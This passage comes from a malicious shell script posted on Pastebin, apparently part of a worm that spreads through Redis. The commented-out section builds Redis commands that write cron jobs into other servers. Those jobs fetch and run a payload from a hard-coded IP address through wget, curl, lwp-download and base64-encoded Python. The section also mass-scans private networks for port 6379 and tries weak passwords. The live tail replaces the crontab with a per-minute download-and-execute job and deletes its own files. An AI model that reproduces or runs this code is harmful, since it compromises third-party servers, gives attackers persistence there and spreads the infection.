  422. #   rm -rf /tmp/.checking
  423. #fi
  424.  
  425. #if [ -f "/tmp/.redis" ]; then
  426. #   if ! command -v "redis-cli" &> /dev/null
  427. #   then
  428. #       echo "COMMAND could not be found"
  429. #       apt install redis-tools -y >/dev/null
  430. #       yum install redis-tools -y >/dev/null
  431. #
  432. #   else
  433. #       if [[ $EUID = 0 ]]; then
  434. #           echo "xd" > /tmp/.redis
  435. #           apt install redis-tools -y >/dev/null
  436. #           yum install redis-tools -y >/dev/null
  437. #           echo 'config set dbfilename "backup.db"' > /tmp/.dat
  438. #           echo 'save' >> /tmp/.dat
  439. #           echo 'flushall' >> /tmp/.dat
  440. #           echo 'set backup1 "\n\n\n*/2 * * * * wget -q -O - http://205.185.116.78/xms | bash -sh\n\n"' >> /tmp/.dat
  441. #           echo 'set backup2 "\n\n\n*/3 * * * * curl -fsSL http://205.185.116.78/xms | bash -sh\n\n"' >> /tmp/.dat
  442. #           echo 'set backup3 "\n\n\n*/4 * * * * lwp-download http://205.185.116.78/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms\n\n"' >> /tmp/.dat
  443. #           echo 'set backup4 "\n\n\n*/5 * * * * echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8yMDUuMTg1LjExNi43OC9kLnB5IikucmVhZCgpKSc= | base64 -d | bash -\n\n"' >> /tmp/.dat
  444. #           echo 'config set dir "/var/spool/cron/"' >> /tmp/.dat
  445. #           echo 'config set dbfilename "root"' >> /tmp/.dat
  446. #           echo 'save' >> /tmp/.dat
  447. #           echo 'config set dir "/var/spool/cron/crontabs"' >> /tmp/.dat
  448. #           echo 'save' >> /tmp/.dat
  449. #           sleep 1
  450. #           rm -rf /tmp/redis_vuln.txt
  451. #           nohup /tmp/masscan 10.0.0.0/8 172.16.0.0/12 192.168.0.0/16 --max-rate 600000 -p6379 --wait 0 | awk '{print $6}' > /tmp/redis_vuln.txt
  452. #           cat /tmp/redis_vuln.txt | while read line; do
  453. #           cat /tmp/.dat | timeout 3 redis-cli -h $line &>/dev/null &
  454. #           cat /tmp/.dat | timeout 3 redis-cli -h $line -a redis &>/dev/null &
  455. #           cat /tmp/.dat | timeout 3 redis-cli -h $line -a root &>/dev/null &
  456. #           cat /tmp/.dat | timeout 3 redis-cli -h $line -a oracle &>/dev/null &
  457. #           cat /tmp/.dat | timeout 3 redis-cli -h $line -a password &>/dev/null &
  458. #           cat /tmp/.dat | timeout 3 redis-cli -h $line -a p@ssw0rd &>/dev/null &
  459. #           cat /tmp/.dat | timeout 3 redis-cli -h $line -a qwerty &>/dev/null &
  460. #           cat /tmp/.dat | timeout 3 redis-cli -h $line -a qwerty123 &>/dev/null &
  461. #           cat /tmp/.dat | timeout 3 redis-cli -h $line -a abc123 &>/dev/null &
  462. #           cat /tmp/.dat | timeout 3 redis-cli -h $line -a abc123! &>/dev/null &
  463. #           cat /tmp/.dat | timeout 3 redis-cli -h $line -a 123456 &>/dev/null &
  464. #           cat /tmp/.dat | timeout 3 redis-cli -h $line -a admin &>/dev/null &
  465. #           cat /tmp/.dat | timeout 3 redis-cli -h $line -a mysql &>/dev/null &
  466. #           done < /tmp/redis_vuln.txt
  467. #           rm -rf /tmp/.redis
  468. #       else
  469. #           echo "xd" > /tmp/.redis
  470. #           echo 'config set dbfilename "backup.db"' > /tmp/.dat
  471. #           echo 'save' >> /tmp/.dat
  472. #           echo 'flushall' >> /tmp/.dat
  473. #           echo 'set backup1 "\n\n\n*/2 * * * * wget -q -O - http://205.185.116.78/xms | bash -sh\n\n"' >> /tmp/.dat
  474. #           echo 'set backup2 "\n\n\n*/3 * * * * curl -fsSL http://205.185.116.78/xms | bash -sh\n\n"' >> /tmp/.dat
  475. #           echo 'set backup3 "\n\n\n*/4 * * * * lwp-download http://205.185.116.78/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms\n\n"' >> /tmp/.dat
  476. #           echo 'set backup4 "\n\n\n*/5 * * * * echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8yMDUuMTg1LjExNi43OC9kLnB5IikucmVhZCgpKSc= | base64 -d | bash -\n\n"' >> /tmp/.dat
  477. #           echo 'config set dir "/var/spool/cron/"' >> /tmp/.dat
  478. #           echo 'config set dbfilename "root"' >> /tmp/.dat
  479. #           echo 'save' >> /tmp/.dat
  480. #           echo 'config set dir "/var/spool/cron/crontabs"' >> /tmp/.dat
  481. #           echo 'save' >> /tmp/.dat
  482. #           rm -rf /tmp/redislan /tmp/redislan.txt
  483. #           sleep 1
  484. #           nohup /tmp/scan $range.0.0-$range.255.255 6379 > /tmp/redislan.txt
  485. #           cat /tmp/redislan.txt | awk '{print $1}' | uniq | shuf > /tmp/redislan
  486. #           sleep 1
  487. #           cat /tmp/redislan | while read line; do
  488. #           cat /tmp/.dat | timeout 3 redis-cli -h $line &>/dev/null &
  489. #           cat /tmp/.dat | timeout 3 redis-cli -h $line -a redis &>/dev/null &
  490. #           cat /tmp/.dat | timeout 3 redis-cli -h $line -a root &>/dev/null &
  491. #           cat /tmp/.dat | timeout 3 redis-cli -h $line -a oracle &>/dev/null &
  492. #           cat /tmp/.dat | timeout 3 redis-cli -h $line -a password &>/dev/null &
  493. #           cat /tmp/.dat | timeout 3 redis-cli -h $line -a p@ssw0rd &>/dev/null &
  494. #           cat /tmp/.dat | timeout 3 redis-cli -h $line -a qwerty &>/dev/null &
  495. #           cat /tmp/.dat | timeout 3 redis-cli -h $line -a qwerty123 &>/dev/null &
  496. #           cat /tmp/.dat | timeout 3 redis-cli -h $line -a abc123 &>/dev/null &
  497. #           cat /tmp/.dat | timeout 3 redis-cli -h $line -a abc123! &>/dev/null &
  498. #           cat /tmp/.dat | timeout 3 redis-cli -h $line -a 123456 &>/dev/null &
  499. #           cat /tmp/.dat | timeout 3 redis-cli -h $line -a admin &>/dev/null &
  500. #           cat /tmp/.dat | timeout 3 redis-cli -h $line -a mysql &>/dev/null &
  501. #           done < /tmp/redislan
  502. #           rm -rf /tmp/.redis
  503. #
  504. #       fi
  505. #
  506. #   fi
  507. #fi
  508.  
  509. if crontab -l | grep -q "$url\|$base"
  510. then
  511.     echo "Cron exists"
  512. else
  513.     crontab -r
  514.     echo "Cron not found"
  515.     echo "* * * * * (curl -s http://$url/xms||wget -q -O - http://$url/xms)|bash -sh; echo $base | base64 -d | bash -; lwp-download http://$url/xms /tmp/xms; bash /tmp/xms" | crontab -
  516. fi
  517.  
  518.  
  519. rm -rf "$DIR"/2start.jpg
  520. rm -rf "$DIR"/xms
  521. localgo
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!